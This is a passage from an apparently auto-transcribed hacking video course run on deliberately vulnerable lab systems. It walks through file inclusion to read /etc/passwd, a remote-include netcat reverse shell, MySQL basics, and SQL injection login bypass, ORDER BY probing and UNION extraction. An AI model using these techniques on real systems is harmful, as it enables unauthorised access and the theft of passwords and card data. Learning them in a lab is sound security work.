folder here. I want to go to password. Okay, so sorry for having some mistakes here. Password, I don't know. Let's hit that tab here so it completed. By default, you see that we got password php okay, in here I think we got something called password file, I think. So I'm going to cat this. That is okay, password PASSWD. So I'm going to use that and hit enter. So you see that we are having all this important thing that is stored here, and these are all, you know, important thing, and these are password. Okay, very important stuff that is stored here. We can use them, and I'm going to access to this location. You see we are into etc folder, and inside here we have a file called PASSWD. So I want to access that. So from here, and you saw that we had page, okay, we had a question mark, and then we have page, which is going to be equal to this one. So I need to go back, okay, 5 times. Because of this one, I'm going to go 5 times, okay, 1 2 3, this one 4, and this one 5. So we are in here. We need to go back right in here, and from here we can access the etc folder. So page is equal, okay, 1, and then 2, and then 3, and then 4, and then 5. And then I want to go to etc folder, okay, etc folder, and in here, if I hit enter right now, I see nothing, okay, nothing important. But if I just write password and hit enter, you see that I get very important thing here. That is all the password and all good stuff that I can use it. So I will copy that, and then I open my mouse pad, and then I paste it right here, and then I use it in my own benefit. Okay, so good. It is how we can use file inclusion. Okay, and that is it. This was file inclusion attack. So thanks for watching, and while if you're a developer, be careful about this, to, you know, to modify this or to code this in a good way, so nobody can access your files like this, that we can access them. So thanks for watching. Okay, in this video I am going to take you once again to file inclusion, and in this video I'm going to do the file inclusion remotely. What does that mean? That means if there is an option, okay, in the server, PHP server, if that is on or enabled, then we are able to run or execute some files from our own computer on the system. As you see here right now, we are able to include some file. The files that is included or that is located in the Metasploitable server or Metasploitable system, that we are able to include files that are located in our own system, like Kali Linux, because these both are in the same network. So is it possible or not? Yes, it is possible if there is an option, if that is going to be on in the this system, okay, Metasploitable. Let's go and see that in PHP ini, and if it is on, then we will be good to go. If it is not on, we are going to make it on right now to do this task, to do this test. Okay, so I'm going to use sudo. Okay, you need to use sudo right now because I'm super user. I'm not going to use that, so we just use nano, and then we need to go into a location, and that location is in etc and then PHP 5, and in here it is CGI and php.ini, and hit enter. And then if you try to find it, it is very hard, but we need to search for it. Okay, so use Control and then W to, and then right here to allow underscore URL, and hit enter. And as you see, we have two options here. One of them allow URL open, and also allow URL include. And for me, these both are on, but for you, if some of them are off, you can make them on, and then use Control O and then Control X to write it down. So for me it is okay, I don't want to do anything. Okay, and then I go back to my system that is here. And in here we need to go to mousepad or to your text editor to create a file here, okay, to run our script into that system again. So in here I am going to create a PHP file, okay, and here you need to create a function, okay, call a function that is called pass-through. Just you need to write the same as this one, and inside here if you give any kind of command, it will execute on the system. But here I am going to use the last command that we just used, okay, with the netcat to hack that system. Again, I'm going to use that here. So it was nc, that was for netcat, and the rest, it is e, and then bin sh, okay, then your IP, and then the port. So I think it is complete like this, and then we need to use the semicolon at the end. Now I need to save it and store it into my server, okay. Right now I'm going to put this into desktop, and I'm going to name this reverse.txt. I'm not going to save it as PHP file, because if I do that, it will run from my Kali Linux. I don't want that. And now I don't need anything here. I close it, and it is time to come right here. You see that is here. I want to cut this from here and move it to my server, okay, Apache server. HTML, here I'm going to open this as root, Kali, and just paste it. So after that is pasted, what is this? Error when getting information from this one, no such file or directory. That is okay. I can, okay, you can see that we have this here now. If I open this, I don't know what happened. We don't have that. I don't know if it is. Okay, right now it is opening with Visual Studio Code. Let's see if it is here. Okay, everything good. Now that is okay. And now let's go to our terminal right here and try to see if it is there or not. So it is 4, and then the name of that was reverse.txt. Hit enter. As you see, that is right in here, and now we can use it. I'm going to copy this link and then go back to my this file, okay, this location, file inclusion, and you see we have the page is equal to include.php. Now instead of putting this, I'm going to put my own link, which is here, and at the end you need to use a question mark because you want to run the PHP file. So before that, before I hit enter, I need to open a new terminal, and when the new terminal is opened, in here I am going to use netcat, and I'm going to listen to this port. And here let's hit enter, but like this, I'm going to hit enter. So it is loading, and in here you will see something will happen, but not yet. Okay, now you see we got the connection, and if I use ls, you see we are in this location. We have all this pwd and id, okay, uname -a, and you see that we are able to hack this system remotely from a file that is located in our own computer, and then we hacked the computer that is in a separate one, okay, in another place, but we are in the same location. And also the most important that was that allow URL include must be on. So If that is not on, then you cannot do that. Okay, so thanks for watching. Okay, now I am going to show you some basics of MySQL. What is MySQL and what is it used for? You know, MySQL is it's a database. What is a database? Database is a place, or it is, you know, collection of columns and rows that it store data inside it. Okay, so here I am going to show you how it is ordered, okay, how data is stored into MySQL, and how important it is to know the MySQL and some queries. And if you want to learn something about MySQL injection, it is very important to know the MySQL itself too. So in here I'm going to type in my Metasploitable. Okay, of course we can type it in our Kali Linux too, but for me it's giving me some kind of error because my version of MySQL in Metasploit and also in Kali Linux, these are not the same, so I cannot connect. I mean, the client and the server version are different, so I cannot connect it. So I'm trying to connect from my Metasploitable, and let's see what is it looks like. So I'm going to type MySQL, and after typing that, okay, I type U means username, and the username for this is root. If you're trying to access it from your Kali Linux, you need to provide it the IP of your server as well, and then hit enter. If you're able to connect, so that's good. If you're not, then come to my Metasploitable like me, just type mysql-u and then root and hit enter. And right now you see we are into MySQL, okay, bash or shell. Here if I type show databases and hit enter, you will see that we have a lot of databases here. Okay, the first one, which is information is schema, that is not actually a database. Okay, it is a kind of database, but it's not something that people created. Okay, when we install the database MySQL in here, when it is installed, so it will be created by default information, so it is gathering some information. Okay, and DBWA, Metasploit, MySQL, OWASP 10, TQWiki, and also TQWiki 195, these are databases. Okay, databases, I mean, these are things that store data inside them, and people are inserting it, and they are storing this data. So here if I want to go inside one of them, for example OWASP 10, so I type use OWASP 10 and try not to forget to put semicolon at the end and hit enter. Right now you see database changed. Now if I just type show tables and hit enter, right now you see that tables in OWASP 10, we have accounts, we have blocks table, we have captured data, we have credit cards, we have hit logs, pen test tools, and as you see here we have 6 rows in set. Okay, now you see how we can see, okay, how we can move inside a database and how we can see the details that is inside them. And of course I can go inside each of this table and see what are inside them. Okay, so each of them has queries. For example, if you want to see some data, you need to type a query. If you want to add a data, you have a query for that as well. And also if you want to delete, you have another query. If you want to update, you have another query. In MySQL we have a lot of different queries that I'm going to take you through some of them, so those that is really necessary to know. And in here right now I'm going to take you through account. Okay, so let's use select star from accounts and hit enter. So what is select star from accounts? This is called a query. Okay, select, that means when it starts with select, That means I am selecting, I am going to see the data which is inside the account table. Star means everything. I want to see everything that is inside accounts. Okay, and also it could be a different one. For example, you want to select only the username, or only the password, or only the signature, or only is admin. Okay, so you can select them, but right now we use star. Star means select everything. So in here, as you see, we have 1 2 3 4 5 column, and also about 16 rows. And the first one, as you see, it is CID, column ID is an ID. Okay, and it starts from 1 and it increases. The second one is username. You see we have a lot of usernames here, we have a lot of password, signature, and is admin or not. So these are some very important data that nobody should access to. Okay, when inside a website, okay, only the owner of the website or some sensitive person, they have access to this kind of thing. Not everyone. Okay, only the owner of the website, for example, they are able to access it. If someone else accesses it, that means that website is hacked and they got all the information, all the username, password, and now they can use some other's account. So you see here we have the username admin, and then password is also admin pass. So that means now I can use this to log into this website. As you see, these two are admin, but all others is not admin. So it is how you see the data is stored here. Okay, and if you want to learn more about MySQL, you can follow some full course about databases, but here we are not going to go to MySQL and learn a lot about this. Okay, but we are going to go and learn only the basics and some queries. So in the next lecture I will show you how to select and how to insert, how to delete data from this database. Okay, previously I gave you a simple introduction about this MySQL database. Now I'm going to show you how to insert data here into this database and into account table. So if you want to insert something, we have the insert query. Okay, we use insert and then use into and the name of the table. The table's name in here is accounts. Okay, and then you need to put something. Okay, values. We have keys and values. In here is keys and in here is values. As you see, the keys are these headers. For example, username, password, signature, is true or not. So, and the values are all this data that is inserted here. So the accounts, and then inside this you need to add all this stuff like the username, and then after that I want to add the password, and then I want to add my signature, and the other one, which is admin or not, I don't want to add that. Maybe that is default something. If we don't select it, it will be false. So the username is going to be Ali, for example. It is going to be a string, of course, and also the password, I want this to be a string. Password is going to be, for example, pass 123. Okay, try not to forget to add the comma to separate each of them. And also my signature is going to be, for example, I am just testing, and then at the end add the semicolon and then hit enter. As you see, query okay, one row affected. Okay, now I want to see that. If you want to see that, again you need to select it. Okay, so select, start from accounts and hit enter. So as you see, we have added one data here. As you see, the username is Ali, password is pass123, and also I am just testing this as my signature, and also you see is admin is null. Okay, that means nothing got inside this, and it was better to insert this here. Okay, for example, I could insert a true or a false here, but I didn't, so now it is null. It's okay. Now here you learn how to select, how to insert data into MySQL databases. Maybe someday you will need it. In the next lecture I will show you how to delete this back, okay, by using its, for example, CID or what is this? Okay, CID. By using the CID I will delete this one. Okay, so I will see you. In the previous video you saw how to insert and also how to select, and that means see the data that is inside account table or in this database. So now let's go and see if you are able to delete some of this data or not. So delete query is like this. You type delete, okay, and then type from and the name of the table. So it is accounts, and here we are going to use another keyword that is called where. So this is kind of condition. Okay, where, and then add the condition where the CID is equal to, for example, 18. So delete, okay, delete is the keyword from accounts, which is the table name, where, and it's giving you the condition. Where, what is the condition? The condition is to CID be equal to 18. Now if I hit enter, you will see that this row, okay, this data that is here will be deleted. Hit enter, query, okay. So let's select this once again. So I'm going to select and everything from accounts, hit enter. You will see that one thing is gone now, and that is not here anymore. Okay, Ali is not anymore right here to see that. Okay, so that is how you can delete things. And let's see if we can delete some other data that is already in here or not. So I'm going to delete this CID that is 16. Hit enter, and you see that is okay. Again, I can use select star from accounts. As you see, that is gone and that is not here anymore. So now you see how we can delete some data, and also you saw how we can select, how we can do all this stuff. Okay, so thank you. Okay, now that you know how to insert, how to select, and how to delete data, it is time to see how to update some data. And let's go and see, for example, I want to update this one, okay, div, and change it to something else. For example, we have this div, I want to change the password for this one. Let's see password and also the username. Let's see if it is possible or not. And for this we are going to use update, okay, and it is better to type some the keywords or words that belongs to MySQL, like select, from. This needs to be in capital. It's better to be in capital. Okay, so and then name of the table, it is accounts. Okay, and after this you need to use the set keyword and then name of the column, okay, and then equal it to something. For example, the username is going to be equal to something else. Okay, this one right now it is div. I am going to change it to David. And if you want to change some other thing like the password, you need to separate this with a schema, and then give the other name, which is password right now. Okay, password. I'm going to change it to, for example, set and then 1 2 3, and at the end you need to give the condition. So here let's use where CID is equal to 15. Okay, and then hit enter. As you see, query okay, raw must 1 changed 1. So now let's use select star from accounts and hit enter. You see that this is changed. David set 1 2 3, and we didn't change anything else. So it is how it is working, the update. Okay, so let me show you once again. So we use update keyword. It is like select that we see here, and then we don't use star here because we don't want to update everything. Okay, and we give a name of the table. Right now it is accounts table, that is here. Okay, and then we use set keyword. I want to set this to this, this to this, this to this, and that is username to this and password to this, and then we give the condition. The condition right now is to be CID to CID is going to be equal to 15, and that is here. If I could change that, for example, CID to 1, and this 1 would be changed. If I made it, for example, 7, the 7 will be changed. So let's go and try this once again. I am going to change the number 14 the same as 15. So now if I hit enter, and then if I just select star from accounts and hit enter, you see that these two are the same now. Okay, number 14 and also number 15 are the same, and also this thing that we didn't change, that is okay. So it is how you can use the update with the MySQL databases. While we're trying to learn SQL injection, it is better to know these steps. And also, you know, in MySQL we have some other commands too, and also we have some operators like and, or these are also very good. Okay, very important to know them and to use them. And also we have join, and we have a lot of things. You must know that now that you know how to insert, how to delete, how to update, and how to do this stuff, you know everything about MySQL. That is not everything. Okay, that is just a part of it, some important part of this. That is the things that if you sometimes access the database of some website, some company, you need to know how to update that. You need to know how to insert some new data, and you shouldn't delete it. Okay, because it is very, very bad, and you can get like selected, okay, from the database, and you can see them. So it is how you can do all this stuff. Let me show you something or one more thing about select query, because sometimes you may face some very, very big databases that if you use select star, that means you will lose everything. Okay, that means that is very big and you cannot find some specific thing from there. So because of that, I want to show you how to select some specific thing from a database. So for example, we are trying to see only the username, so we just use select and then username, and then from, okay, username from accounts table. Hit enter. It will show you, it will list only the username. Okay, or you want to select something else, username and also the password. So we use select username, okay, and password. Okay, try not to use and here, because if you use and, so it becomes something else. So we need to use schema to separate them. Okay, select username and then schema and then password from accounts. Hit enter. So now you see we use select, we select both username and then password. Or we can use something like select username, or let's select a password by using its username, if it is possible or not. Let's see. I'm going to select password. Okay, we select password from accounts where username is equal to something like admin. Let's see if it is possible or not. Yes, of course it is possible. And you see that by using username we are able to find a password. So and maybe sometimes it occurs that you know the username of some person and you're trying to find their password. Okay, so by using this little query we can find their password. Okay, and we type select password from accounts where username is equal to someone. Okay, someone's username, and then it will give you the password. If sometimes it happens that you find a very big database and you're trying to find some specific thing, you use that like this. Okay, so select something from the table name where and then give the condition. Okay, or you know the user ID. User ID is, or CID is kind of difficult to remember it, that you know the username and you want to find the password. It is very easy to find it. Now I'm going to show you more details of this select and also the AND operator and how we can use some condition with this select. The same thing that the login form work. Okay, in the login form, when you type your username and then the password, it come into the database and start checking if the username is equal to the username that user enter, and also if the password is equal to the password that user enter, then let him to access to the database and then select this data from database and then show it to the user. If not, so it will ignore it and show some kind of error messages. So here I'm going to show that to you so you can understand that, and later we will use them in SQL injection. So I'm going to use select star from accounts, which is the the table that is here I have shown you before. Okay, account, and this data is inside the account table. So in here I'm going to use a condition that is called where. Okay, that is better to select be capital, select star from accounts, and where. Okay, where this username is equal to something. Okay, is equal to something that user enter. If the user enter admin, then it must be equal to admin. Okay, if it is equal to admin, and in here we need to use AND. This is the AND operator that we are going to check the both side. Okay, the left side is username and the right side is the password. So it is time to password, and this password is going to be equal to something. What is that? That is admin pass. Okay, if these are true, you see that we have one condition here, and the username, which is equal to admin, and we have the AND operator here, and we have the right side, which is the password. Password is equal to admin pass. If these two true are true, if the first one is true, then the true with true, left and right both become true, then true become true, then it will select everything from the database. If one of them is not true, then it will not select from the database, and because such kind of data does not exist. Okay, so right now because both of them are true, then it will select it. So let's hit enter. You see that it selected the admin and it allow me to log in, for example, in the user interface. Okay, Just imagine I am going to add a wrong, for example, the username is going to be, for example, name at, okay? And here now if I hit enter, you will see that it gives me an error and an empty here. Actually, that means that kind of data does not exist in the database. Okay, so now you know how to select using condition and also and here, so later we can understand that better. So you see we have where and then the username is equal to, we have codes here, okay? It could be double code, it could be single code, no problem. And then we have and then the password which is here, and the things that the user enter comes inside these codes, okay? Single code right now that it will check and compared with the database. If those are equal together, then they will be able to log in, they are allowed to log in, or they are allowed to have access to the database. If not, so not. Okay, so as you see right now we are allowed to see this one. Okay, we are allowed, for example, to log in. So you can check it in the interface that what kind of operation you want to do on this. So it could be like this. In the SQL injection, I can show you just the same thing as like this. Okay, when we use beside this quotation mark something else like this, for example, we have that one, and then we have an AND operation here. I will add an AND operation here and then tell that 1 is equal to 1, so it is true, no problem. Okay, it is not going to be checked on the database. Okay, so it is a condition that 1 is equal to 1, and now if I hit enter again, it is going to give me that result. Okay, of course that is exist, but when we do not, when we do not fix this issue on the interface by using some kind of JavaScript or using PHP, it will be a problem. Okay, so right now you see we are able to use and here. It is the query, it's no problem, but in the input, if we are able to use and or some kind of quotation mark, then it is going to be a very big problem. Okay, so I will show you that and you will understand that perfectly. So thanks for watching, and let's go for the big matches. Let me show you something or one more thing about select query, because sometimes you may face some very big databases that if you use select star, that means you will lose everything. Okay, that means that is very big and you cannot find some specific thing from there. So because of that, I want to show you how to select some specific thing from a database. So for example, we are trying to see only the username, so we just use select and then username and then from, okay, username from accounts table. Hit enter, it will show you, it will list only the username. Okay, or you want to select something else, username and also the password. So we use select username, okay, and password. Okay, try not to use and here, because if you use and, so it becomes something else. So we need to use comma to separate them. Okay, select username and then comma and then password from accounts. Hit enter. So now you see we use select, we select both username and then password. Or we can use something like select username, or let's select a password by using its username, if it is possible or not. Let's see. I'm going to select password. Okay, we select password from accounts where username is equal to something like admin. Let's see if it is possible or not. Yes, of course it is possible, and you see that by using username we are able to find a password. So And maybe sometimes it occurs that you know the username of some person and you're trying to find their password. Okay, so by using this little query we can find their password. Okay, and we type select password from accounts where username is equal to someone. Okay, someone's username, and then it will give you the password. If sometimes it happens that you find a very big database and you're trying to find some specific thing, you use that like this. Okay, so select something from the table name where and then give the condition. Okay, or you know the user ID. User ID is, or CID is kind of difficult to remember it, that you know the username and you want to find the password. It is very easy to find it. Today I am going to teach you the order by. These order by, actually it looks like a keyword. It's gonna be used with select, okay, with select query, and then we use it, we can order the data ascending and also descending. So it is going to be used a lot in, for example, while we are going to test a website if they are accepting some kind of vulnerability in URL, that we want to do this very fast and see if they are accepting SQL injection or not. It's going to be used a lot in such kind of places. So here I am going to go through this. Okay, I'm going to select from this table. So I'm going to use select star from accounts. Okay, and I can now use order by. So you see it is a SQL keyword, so we need to make this big. So order by, and then when we select this, we can order this by something. For example, I'm going to order this by CID, and now if I hit enter, you will see the same as before. But when we add some extra thing like ascending or descending, it will change the order data. So ascending is start from 1 up to the last number, but descending is going to be changed this. So now you see it starts from 18 and last 1. Okay, ends with 1. And also we can order this by anything else, for example by username, and as you see right now it is descending. So when I use that, you see the last letter. Okay, it's going to order this with the first letter, I think with the first and second letter. You see the last one is A, the first one is S right now. But if I change this to ascending, or even I remove everything from here, so it's gonna order that ascending. So you see A and the last one is S. Also we can do that by anything we want in here. Okay, so now you see it's 1, 2, and then the number 8, and then number 5, number 12, 15. It is not ordered according to the number that is right in here. Okay, so we are going to use this order by in finding if some kind of website accept SQL injection or not. Okay, so because of that, you need this in here to learn it. Okay, you need to know how to use this. Also we can do this by a number. For example, I'm going to do something else. Let's say that select username and password from accounts. Okay, and then right now let me hit enter. So you see right now it is giving me an error because I used and here, so I must username. Okay, I must be using a schema here. Now if I hit enter, you see that it gives me that, and in here now I can order this. Okay, I can order this like this. For example, order by ordered by username, for example. So you see it is ordered now according to the username, and you see the last one is Simba now. But if I drop this now, sorry, now you see the last one is name it. Also, we can do another way, okay, like select what should I select to check if something is I can use select star from accounts, and I can use a where here. So where this username is equal to something, for example name it, and now here I use and the password is equal to something like 1 2 3 4 5 and 6. Now when I hit enter, that you see that it is giving that to me. Now if I just use an order by here, order by, for example, a number like 1, again you see that it is not going to affect anything. It is going to give me the the result. So it is a very, very good option that we need to use this, especially this one, order by a number, in our query. Right now if I give it a number, something nonsense, it will go to order by, for example, 12. Okay, sorry, I don't know what happened. Select star from account where username is equal and password is equal to this, order by. You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use this one at line 1. Okay, so something just happened. I don't know what that is. So it is how we can use order by. Okay, so it is because of, I think, this order class that we just used this. So I am going to remove this once again and hit enter. So it is giving me the result. Now if I just use order by number 1 and then hit enter, again you see that is giving me the result. So we had some kind of mistake in here or some extra thing that happened, so I don't have time to check for that. Okay, so right now you see if we use this order by a number, again it's going to give me the result. So we are going to use this kind of query in especially in get methods, not post methods, get methods, and it's gonna find if a website allow us to do some kind of SQL injection on them or not. So, and I will see you with another one. Okay, today I am going to show you the onion and also how we can use it, where do we need to use it. So this union that is right like this, and it is used to get unique data from tables, okay, from multiple tables, like from 2 tables, and we are going to use this here. And later on we are going to need this a lot in for example in MySQL or SQL injection. For example, we have access to account and we want to get the database information, we want to get the, for example, credit card information. So it is going to be very necessary to know this union. So as you see here, we have a lot of tables right now inside this OWASP 10. One of them is accounts, and also we have credit cards, which is too important here. I want to select them all here and show you how we can use them. Okay, so let's first, I'm going to use select star from for example accounts. Okay, and let's hit enter. You see we have all the information that is listed here, and the important thing is username, password, and then my signature. Okay, these are all the data, these are the headers that we need them. And also we need to use another thing, okay, that is going to be select star from, for example, it was, I think, credit cards. Okay, we got some kind of error here. Credit cards, I don't know, credit cards. Let me use show tables, credit cards. So select star from, what is that? Credit cards. Okay, so in here you see we have some other details like CC-ID, CC number, CCV, and also the other one, which is this one. So imagine I am going to get some details like I want to select the username from account, and also I want to select CC number from the other thing, which is credit card. Okay, so am I able to do this or not? Let's go and see that. Okay, by using union we are able to do this. So I'm going to select that. Okay, select username from accounts. Okay, and then we need to use this very good thing, which is onion. Okay, and then we use select from, or we can give the name, which is CC number from name of the table, which is credit cards. Now let's hit enter and see what do we have here. So as you see right now, we are having all the usernames and also the credit cards that is all listed down here. So by using only these onion keywords, these are all unique. Okay, if there is some kind of repeated data, it will not select that. So completely unique data, and we are able to select this from two tables to completely different tables. Okay, now we can use it like this. Okay, it's one of the very simple usage of this union, and we are going to see this simple usage in the SQL injection as well. So you will see that how we can get the information of the database, and also when we have the data of one user to log in. Okay, so I will just show you, okay, in its section in the future. So thanks for watching, and I will see you in the next video. Okay, in this video I am going to show you one of the databases, big databases, that when you install MySQL, it is installed by default. Okay, you don't need to create that database. It is called information schema. This information schema will store all the tables from all other databases. So here I'm going to show you how to select all the tables from that information schema. So if I type show databases and hit enter, you see we have these databases right here that we can use them. Okay, the first one is called information schema. This information schema have the tables of all other databases like DBW, Metasploit, MySQL, OWASP 10, and all of them, okay, is stored into information schema. So today I'm going to show you how to select all these tables name from information schema. So later you will need this while we start learning SQL injection. So it is very easy. Just need to type select and then table underscore name from information underscore schema dot table. Now if I hit enter, okay, we got a information schema we got an error, and that is because of not adding an is. So now when I type that and hit enter, you see that we have all the tables here. As you see right now, we have 430 rows. That means we have 430 tables selected here, and now we can use it. Okay, so how we can use it? Okay, select table name from information schema dot tables. It is very easy. You're gonna need this a lot in many places while we start learning SQL injection. So try not to forget this, and I will see you with this part, okay, using this completely practical in not social engineering, in MySQL injection actually. Okay, and I will use this practically and using from the front end to get these databases, not databases, these tables actually. Okay, so thanks for watching, and I will see you in the next video. Okay, now let's go and try to open this Metadata. Okay, we have this. It use that database that we were working on, that was VAPT, that is right in here, and we have login register part here. I'm trying to log in, or at least let's go to create a new account for ourselves. I'm going to use, for example, name it, and the password is going to be 123456 and 123456 and something. Okay, and let's create our account and then go try to log in. Okay, it gives me an error. What is this error? Let's see. Error failure is always an optional. Okay, error inserting record table metasploit.account doesn't exist. What does that mean? That means right now it is using someone else's website, someone else's database. Okay, it's not using VAPT. And as you see, insert into account username, password, my signature, and name at 23 something. That is okay. The query, it doesn't have any kind of problem, but the message, as you see, the error, it make it clear that our database that we're using is something else. We need to go right in here to fix it. Okay, so let me exit this from here now. Let me clear it, and in here I am going to change my directory, city var. Okay, and then www, and then Metadata, hit enter. If I use ls, we have a lot of files here right now. That one that I want to change it, that is config.inc. So I'm going to use sudo nano, that is config.inc, hit enter. Okay, right now you see the DB name, it is Metasploit. That is something empty. Okay, Metasploit, and I want to change this to VAPT. So VAPT. Okay, if I don't make any kind of mistake in spelling, then I am going to hit Control O and then hit enter, and then Control X to exit this, and you can clear it if you don't want it. So put it like that. So now it is time to go back and come right in here, resend it. Okay, as you see, account created successfully. That is okay. I am going to remove that, and I'm going to create it once again. So I'm going to go to MySQL and show databases and use VAPT, and then let's show tables. Come on, show table. Okay, we have account. I'm going to select start from accounts. Okay, we have this, and you see that it is inserted successfully, and I'm going to delete this right now. I'm going to show you again, once again, from the completely basic. So I'm going to delete, okay, from accounts. Here CID is equal to 710. Okay, so again, if I just see nothing here, and I want to remove that all from here. Now I want to go to Matilde again, and then go to login and register. I want to register a new account, that is, please register here, and I'm going to give this name it, okay, and then the password 123456 123456, and hello, this is my new account. So I will just give that some text as signature, and then hit the create account. You see account created for Nemat, one row inserted. That is good. Okay, we don't get any kind of error. So let's go try to log in, and the username it was Nemat, and the password it was 123456, and hit login. And as you see right now, don't save this, and you see we are logged in. Let me, where can I find this? Okay, you see, hello, this is my new account. You see I am logged in, and the logged in username it, and also the security level, that is not very good, 0. Okay, not important, I mean. Matilde deliberately. Okay, so that is it. Okay, right now we are logged in, and that is it. So we are logged in, and the thing I want to test is some MySQL injection. Okay, MySQL injection. So here I'm not going to do that because we faced an error and I solved that, and I hope you don't face that kind of error. If you do, so you know how to solve that. Okay, we just go into our server and then change the name of the database, and that is all, and we're set up to go. In the previous video, I created an account in Matilde. Now I'm trying to log in using my account, and that was Nemat and also 123456. And I'm getting login by hitting the login. As you see, I am successfully logged in. Okay, so that is okay. I am able to log in. But now I'm going to check if this website allowing me to do some kind of SQL injection on this website or not. So let me open this text editor. I'm going to make it very small here. Okay, or I could just do something else. Okay, I will put that right there, and then put this thing right here. If some necessary thing, there was some necessary thing I can type. Okay, so in here I'm trying to type my username, which is Nemat, and then the password, which is 123456. But now I'm trying to add just a single code to see if it is allowed or not. Okay, so a single code and hit login. As you see, we are having a failure, and that is, it's not a failure from because of that single code. Okay, it's not because of they configure somehow that they are not allowed to use SQL injection. It is database error, and it is telling that select start from accounts where username is equal to Nemat and the password is equal to an empty thing, and it is telling me that you have an extra code here, and because of that we are not able to log you in. Okay, it is not telling me that your password is empty or your password is wrong. Okay, it is telling me that you have an extra this thing and we are not able to log you in. So I added a single code right here. Okay, But what if I add my password here and then somehow configure this to comment this? Am I able to do that or not? The way that I just showed you in the real database. Okay, in here I am going to just type something like this. Okay, 1 2 3 4 5 6. Okay, as you see, this database itself, it is adding this thing. Okay, the single quote itself around the password and around the username, and at the end you see we add one extra that, okay, extra single quote, and then I will just use and 1 is equal to 1, and then I can use something like this, a hash. Okay, so if I use a hash means comment. This will comment that single quote, and then it will not be able to determine that, okay, this one, because right now I am able to use SQL query in my input. Okay, we shouldn't be allowed to do this, but right now that I am able, I am going to use this thing, copy this from here, and then paste it in my password login form, password input. Okay, I'm hitting login, and you see we successfully logged into this website. See, logged in as username at. Why? You know why? Because they didn't configure this very well. Of course, it is just for testing, okay, for testing the kind of SQL injection, but later on we will understand, we will see that how dangerous it is, okay, that we can access databases, we will be able to have access to the databases. Okay, so I will show you more. Right now it is just the simplest way of seeing if you are allowed to use SQL injection on database or not. So they did not configure this in the right way to use SQL injection. That means right now I am allowed to use this little thing, which is single quote here. In login form, you should configure your login form in a way that a user must not be able to use single quote or special characters in their in the login form, okay, or into inputs. Okay, so, and that is it. I will see you in the next video with another SQL injection tutorial. Okay, today I am going to show you how to find if a website allowing us to do some SQL injection on them or not, using the get method that is that will show in the URL. What is a get method? The get method is, we can, it is a kind of method that while we are sending data through some input, we will see them in the URL. Okay, let me show you that right in here. SQL extra data, user info. So in here this is a form, okay, and as you see we have view account details. Right now if I give the details of a person and hit the view account details, it will send it to the URL. Let's see, for example, I am going to go with NEMAT and the password 1 2 3 4 5 6 and hit enter. Don't save it. You see we are able to see the details of NEMAT right in here, and also the same things goes in here. Okay, you see that when we type username as NEMAT, that is here, the password as 1 2 3 4 5 6, that is here, and user info, submit, and all the details are in the URL. Okay, now it is called the get method. So when the get method, when the people are using get method, so they will send the data through URL. Okay, that means we can see them. If the method is post, so you will not be able to see them in the URL. Okay, so today we will use the URL to see how we can find if a website allowing us to use some kind of SQL injection or not. So as you see here, we have index.php. In a website, whenever you see index.php and then page is equal to this one, or maybe page is equal to number 1 or something like that, you can try to see if they are accepting SQL injection or not. Okay, it is better to go and see them. So right now you see we have the username is equal to this one. Let me open app right in here. I'm going to come right in here. So as you see, we have something that is user info is equal to username, and then username is equal to this one, password is equal to this one. So let me write the query for this one, okay, for getting the username and password that you see right here. So what was the query, select query that you right now see the username and password right here. So that is something like this: select star from accounts, and then when it is selected everything from account, and I want to give some condition. Okay, so when you want to give the condition, you need to use the vir and then the username, okay, which is going to be equal to, right now you see the username is equal to name it. We have another thing, and that is and password is equal to 1 2 3 4 5 6. Okay, so this is the query right now that select everything that is here and showing us to them to me. Actually, these are not coming from the database, this is coming from the this form that is here, but actually it is going to be like this. And we are going to do something here, okay, and that is to use order by right in here. So I'm going to use order by a number, like by 1. Okay, so in one of the video I showed you that we can use order by in some kind of get methods, and now I am going to use that in here. So as you see, we have this thing will give us this, okay, the single code itself, the database will give it, so we don't need to add that, and we need to add 1 and then add a comment. So right now you see we have the name here, and after name I can add something like a single quote, and then I can add a comment to comment this back. So now I can use the order by here, so order by a number could be 1, and then I can use the comment. So right now it is okay, but the comment, as you see this hash, the URL is not going to understand this, it's a hash. Okay, it has a code, so you need to decode this. For now, the code for that is, I think, percentage 25 or 23, I don't know exactly, maybe 25, and we will see. Okay, we will see if it is not working, then it is 23. I'm sure it is 25, so we will see that. Right now, if I hit enter, you will see that nothing happens because we can get this data, and then we are still logged in. So let me hit enter. So as you see, we got some error here. That means this code is not okay. Let me make it 23. So by mistake I made it 25. Okay, I thought that the code for that is 25. So right now you see when I hit enter, we are getting back this data that you see. Okay, so right now we can understand that this website allowing us to use some SQL injection on them. So now I can go and search how can I do more and more stuff on this website. So it was very easy, okay, to do this thing, just writing this 4 or 5 word in here, and then we can find out if the website is allowing us to do some kind of SQL injection or not. So it is this kind of actually this kind of thing is going to be used only on get method, not post method, only on URLs. Okay, and that is it. For example, sometimes we use searching something on the real websites, so the search always use get method. You can use this kind of thing on their website if they are allowing us to use SQL injection or not. Okay, you can find out that by just testing them. So thanks for watching. Okay, in the previous video I showed you something about this little thing which is order by, and then we were adding a number here and we were able to get the data like this. Okay, and that means we were able to see, and we proved that this website allowing us to use SQL injection on them. Okay, and in one of the video I showed you how to use union, okay, and how to get information from multiple tables. So in here I'm going to show that as well, and right in here we have order by 1. Let me increase this number and see how many data do we have here. Okay, for example, I'm going to give this at least it, and let's have enter. As you see right now we don't have it user here. Okay, and see what is the problem, and a message say executing query unknown column it, so we don't have that number. Let's go with number 6. Okay, we don't have 6 column as well. How about 5? We must have 5 column. Okay, we do have 5 column. Okay, so when we hit 5, that means we do have 5 column in here. Okay, and the thing I am talking about is that I want to select multiple things. Okay, how do I do that? In here, let me open this. As you see right now we have this select. Okay, I'm going to copy this, Control C and then Control V and Control V. Okay, it happened to be multiple time. I will hit and enter here. So you see we are selecting everything from account, your username is equal to name it, and then we have the order by right in here. Now instead of using order by 1, I'm going to use something else. That is going to be, for example, union, and then select like 1, and then let's select 2, and then 3 and 4 and 5. So let's see how this is gonna give us the result. Okay, instead of order by, I'm going to just use this one. So I will just copy this, and here that we have order by, I will just paste it here. Okay, so use Control V and then hit enter. Okay, we have result for 2. Okay, that means that we are having the result for the second number, which is 1 and 2. Okay, for two records. Okay, 1 and this one is 2. So username is 2 and password is 3. Okay, 2 and 3, and also signature is 4, and we don't have for 5 any kind of thing. Let me remove the 5 and see what happened. Okay, it gives me that error, so let's add that right now. Okay, now we have this. Okay, now instead of adding or giving this number here, as you see, I'm going to give something else. Okay, some data that I want. For example, instead of 2, if I give them the database function, it will give me, I think it will give me the database name, and also in here if I give the user, it will give 